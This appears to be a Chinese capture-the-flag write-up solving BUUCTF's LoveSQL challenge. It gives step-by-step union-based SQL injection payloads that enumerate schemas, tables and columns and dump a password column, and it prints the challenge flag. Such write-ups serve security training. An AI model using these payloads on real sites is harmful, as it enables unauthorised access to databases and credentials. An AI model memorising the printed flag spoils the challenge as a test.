提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
BUUCTF的[极客大挑战 2019]LoveSQL 1
一、做题步骤
1.万能密码尝试
直接输入万能密码,能成功登录,但是找到的password并不是flag
2.测试注入列数
1.经过测试,需要用%27替代’ ;%23替代#
2.注入列数为4会报错
1%27order by 4 %23
3.注入列数为3
1%27order by 3 %23
3.测试注入点
1%27union select 1,2,3 %23
2,3皆为注入点
4.查询数据库
①将命令放在注入点2中,但是会造成字符重叠,因此后续操作将命令放在注入点3中
1%27union select 1,group_concat(schema_name),3 from
information_schema.schemata %23
②将命令放在注入点3中
1%27union select 1,2,group_concat(schema_name) from
information_schema.schemata %23
5.查询表名
1%27union select 1,2,group_concat(table_name) from
information_schema.tables where table_schema=‘geek’%23
6.查询列名/字段
1%27union select 1,2,group_concat(column_name) from
information_schema.columns where table_name=‘l0ve1ysq1’%23
7.查询数据
1%27union select 1,2,group_concat(password) from geek.l0ve1ysq1%23
得到flag{9481e0dd-7372-413c-b58b-1c6a3af6468a}